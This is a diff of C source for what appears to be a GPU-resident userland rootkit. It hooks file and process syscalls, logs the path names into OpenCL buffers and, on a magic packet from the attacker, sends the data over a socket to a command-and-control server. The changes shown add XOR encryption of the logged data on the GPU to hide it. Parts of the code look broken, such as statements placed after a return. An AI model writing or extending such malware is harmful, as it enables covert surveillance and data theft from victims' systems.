| skipped 117 lines |
118 | 118 | | } |
119 | 119 | | } |
120 | 120 | | |
121 | | - | static void send_data(const char *buffer){ |
| 121 | + | static void send_data(char *buffer){ |
122 | 122 | | struct sockaddr_in serv_addr; |
123 | 123 | | |
124 | 124 | | int sock = socket(AF_INET, SOCK_STREAM, 0); |
| skipped 18 lines |
143 | 143 | | } |
144 | 144 | | } |
145 | 145 | | |
| 146 | + | // gpu syscall xor ex. |
146 | 147 | | void jelly_init(){ |
147 | 148 | | int i; |
148 | | - | |
149 | 149 | | for(i = 0; i < SYSCALL_SIZE; i++){ |
150 | 150 | | jelly->dev = create_device(); |
151 | 151 | | jelly->ctx = create_ctx(&jelly->dev); |
| skipped 58 lines |
210 | 210 | | } |
211 | 211 | | } |
212 | 212 | | |
213 | | - | static void limit_buf(const char *buffer){ |
| 213 | + | // gpu syscall xor data ex. |
| 214 | + | static char *xor_data(char *buf){ |
| 215 | + | jelly->dev = create_device(); |
| 216 | + | jelly->ctx = create_ctx(&jelly->dev); |
| 217 | + | jelly->program = build_program(jelly->ctx, jelly->dev, __JELLYXOR__); |
| 218 | + | |
| 219 | + | input = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buf, &err); |
| 220 | + | local = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err); |
| 221 | + | group = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err); |
| 222 | + | |
| 223 | + | // device command queue |
| 224 | + | jelly->cq = clCreateCommandQueue(jelly->ctx, jelly->dev, 0, &err); |
| 225 | + | if(err < 0){ |
| 226 | + | // queue failed |
| 227 | + | } |
| 228 | + | |
| 229 | + | // gpu kernel thread |
| 230 | + | jelly->kernels[7] = clCreateKernel(jelly->program, jelly_xor, &err); |
| 231 | + | if(err < 0){ |
| 232 | + | // gpu kernel failed |
| 233 | + | } |
| 234 | + | |
| 235 | + | // gpu kernel args |
| 236 | + | err = clSetKernelArg(jelly->kernels[0], 0, sizeof(cl_mem), &log); |
| 237 | + | err |= clSetKernelArg(jelly->kernels[0], 1, sizeof(cl_mem), &output); |
| 238 | + | err |= clSetKernelArg(jelly->kernels[0], 2, sizeof(cl_mem), &storage); |
| 239 | + | if(err < 0){ |
| 240 | + | // args failed |
| 241 | + | } |
| 242 | + | |
| 243 | + | // host-device comm |
| 244 | + | err = clEnqueueNDRangeKernel(jelly->cq, jelly->kernels[0], 1, NULL, &global_size, &local_size, 0, NULL, NULL); |
| 245 | + | if(err < 0){ |
| 246 | + | // enqueue failed |
| 247 | + | } |
| 248 | + | |
| 249 | + | // read buf from gpu |
| 250 | + | err = clEnqueueReadBuffer(jelly->cq, output, CL_TRUE, 0, sizeof(buffer3), buffer3, 0, NULL, NULL); |
| 251 | + | if(err < 0){ |
| 252 | + | // read buffer failed |
| 253 | + | } else{ |
| 254 | + | return buffer3; |
| 255 | + | buffer2 = ""; |
| 256 | + | buffer = ""; |
| 257 | + | } |
| 258 | + | } |
| 259 | + | |
| 260 | + | static void limit_buf(char *buffer){ |
214 | 261 | | if(sizeof(buffer) >= VRAM_LIMIT){ |
215 | 262 | | buffer = "Buffer too big for GPU!"; |
216 | 263 | | } |
| skipped 13 lines |
230 | 277 | | strcat(buffer, path); |
231 | 278 | | limit_buf(buffer); |
232 | 279 | | |
233 | | - | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err); |
| 280 | + | // buffer now encrypted |
| 281 | + | char *xor_buffer = xor_data(buffer); |
| 282 | + | |
| 283 | + | // encrypted gpu storage |
| 284 | + | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err); |
234 | 285 | | output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err); |
235 | 286 | | storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err); |
236 | 287 | | if(err < 0){ |
| skipped 26 lines |
263 | 314 | | // enqueue failed |
264 | 315 | | } |
265 | 316 | | |
266 | | - | // buffer is now inside gpu |
| 317 | + | // encrypted buffer is now inside gpu |
267 | 318 | | |
268 | 319 | | // if packet from server matches ack-seq keys, dump gpu data, else keep stuffing gpu with more |
269 | 320 | | if(correct_packet){ |
| skipped 1 lines |
271 | 322 | | if(err < 0){ |
272 | 323 | | // gpu buffer read failed |
273 | 324 | | } |
| 325 | + | // unencrypt from server side later |
274 | 326 | | send_data(buffer); // send dumped data via socket to c&c |
275 | 327 | | clReleaseMemObject(storage); // reset storage since attacker chose to dump |
276 | 328 | | } |
| skipped 5 lines |
282 | 334 | | |
283 | 335 | | // release gpu memory then start over when syscall is called again |
284 | 336 | | // we dont release storage object as it will continue to record data to gpu if attacker has not sent magic packet yet |
285 | | - | clReleaseContext(jelly->ctx); |
286 | | - | clReleaseProgram(jelly->program); |
287 | 337 | | clReleaseMemObject(log); |
288 | 338 | | clReleaseMemObject(output); |
289 | 339 | | clReleaseCommandQueue(jelly->cq); |
290 | 340 | | clReleaseKernel(jelly->kernels[0]); |
| 341 | + | clReleaseContext(jelly->ctx); |
| 342 | + | clReleaseProgram(jelly->program); |
291 | 343 | | |
292 | 344 | | return syscall[SYS_FOPEN].syscall_func(path, mode); |
293 | 345 | | } |
| skipped 9 lines |
303 | 355 | | strcat(buffer, pathname); |
304 | 356 | | limit_buf(buffer); |
305 | 357 | | |
306 | | - | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err); |
| 358 | + | char *xor_buffer = xor_data(buffer); |
| 359 | + | |
| 360 | + | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err); |
307 | 361 | | output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err); |
308 | 362 | | storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err); |
309 | 363 | | if(err < 0){ |
| skipped 43 lines |
353 | 407 | | buffer2 = ""; |
354 | 408 | | buffer = ""; |
355 | 409 | | |
356 | | - | // release gpu memory then start over when syscall is called again |
357 | | - | clReleaseContext(jelly->ctx); |
358 | | - | clReleaseProgram(jelly->program); |
359 | 410 | | clReleaseMemObject(log); |
360 | 411 | | clReleaseMemObject(output); |
361 | 412 | | clReleaseCommandQueue(jelly->cq); |
362 | 413 | | clReleaseKernel(jelly->kernels[1]); |
| 414 | + | clReleaseContext(jelly->ctx); |
| 415 | + | clReleaseProgram(jelly->program); |
363 | 416 | | |
364 | 417 | | return syscall[SYS_MKDIR].syscall_func(dfd, pathname, mode); |
365 | 418 | | } |
| skipped 9 lines |
375 | 428 | | strcat(buffer, filename); |
376 | 429 | | limit_buf(buffer); |
377 | 430 | | |
378 | | - | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err); |
| 431 | + | char *xor_buffer = xor_data(buffer); |
| 432 | + | |
| 433 | + | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err); |
379 | 434 | | output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err); |
380 | 435 | | storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err); |
381 | 436 | | if(err < 0){ |
| skipped 44 lines |
426 | 481 | | buffer = ""; |
427 | 482 | | |
428 | 483 | | // release gpu memory then start over when syscall is called again |
429 | | - | clReleaseContext(jelly->ctx); |
430 | | - | clReleaseProgram(jelly->program); |
| 484 | + | // we dont release storage object as it will continue to record data to gpu if attacker has not sent magic packet yet |
431 | 485 | | clReleaseMemObject(log); |
432 | 486 | | clReleaseMemObject(output); |
433 | 487 | | clReleaseCommandQueue(jelly->cq); |
434 | 488 | | clReleaseKernel(jelly->kernels[2]); |
| 489 | + | clReleaseContext(jelly->ctx); |
| 490 | + | clReleaseProgram(jelly->program); |
435 | 491 | | |
436 | 492 | | return syscall[SYS_LSTAT].syscall_func(filename, buf); |
437 | 493 | | } |
| skipped 9 lines |
447 | 503 | | strcat(buffer, filename); |
448 | 504 | | limit_buf(buffer); |
449 | 505 | | |
450 | | - | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err); |
| 506 | + | char *xor_buffer = xor_data(buffer); |
| 507 | + | |
| 508 | + | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err); |
451 | 509 | | output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err); |
452 | 510 | | storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err); |
453 | 511 | | if(err < 0){ |
| skipped 65 lines |
519 | 577 | | strcat(buffer, pathname); |
520 | 578 | | limit_buf(buffer); |
521 | 579 | | |
522 | | - | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err); |
| 580 | + | char *xor_buffer = xor_data(buffer); |
| 581 | + | |
| 582 | + | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err); |
523 | 583 | | output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err); |
524 | 584 | | storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err); |
525 | 585 | | if(err < 0){ |
| skipped 65 lines |
591 | 651 | | strcat(buffer, filename); |
592 | 652 | | limit_buf(buffer); |
593 | 653 | | |
594 | | - | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err); |
| 654 | + | char *xor_buffer = xor_data(buffer); |
| 655 | + | |
| 656 | + | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err); |
595 | 657 | | output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err); |
596 | 658 | | storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err); |
597 | 659 | | if(err < 0){ |
| skipped 44 lines |
642 | 704 | | buffer = ""; |
643 | 705 | | |
644 | 706 | | // release gpu memory then start over when syscall is called again |
645 | | - | clReleaseContext(jelly->ctx); |
646 | | - | clReleaseProgram(jelly->program); |
| 707 | + | // we dont release storage object as it will continue to record data to gpu if attacker has not sent magic packet yet |
647 | 708 | | clReleaseMemObject(log); |
648 | 709 | | clReleaseMemObject(output); |
649 | 710 | | clReleaseCommandQueue(jelly->cq); |
650 | 711 | | clReleaseKernel(jelly->kernels[5]); |
| 712 | + | clReleaseContext(jelly->ctx); |
| 713 | + | clReleaseProgram(jelly->program); |
651 | 714 | | |
652 | 715 | | return syscall[SYS_EXECVE].syscall_func(filename, argv, envp); |
653 | 716 | | } |
| skipped 9 lines |
663 | 726 | | strcat(buffer, pathname); |
664 | 727 | | limit_buf(buffer); |
665 | 728 | | |
666 | | - | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err); |
| 729 | + | char *xor_buffer = xor_data(buffer); |
| 730 | + | |
| 731 | + | log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err); |
667 | 732 | | output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err); |
668 | 733 | | storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err); |
669 | 734 | | if(err < 0){ |
| skipped 63 lines |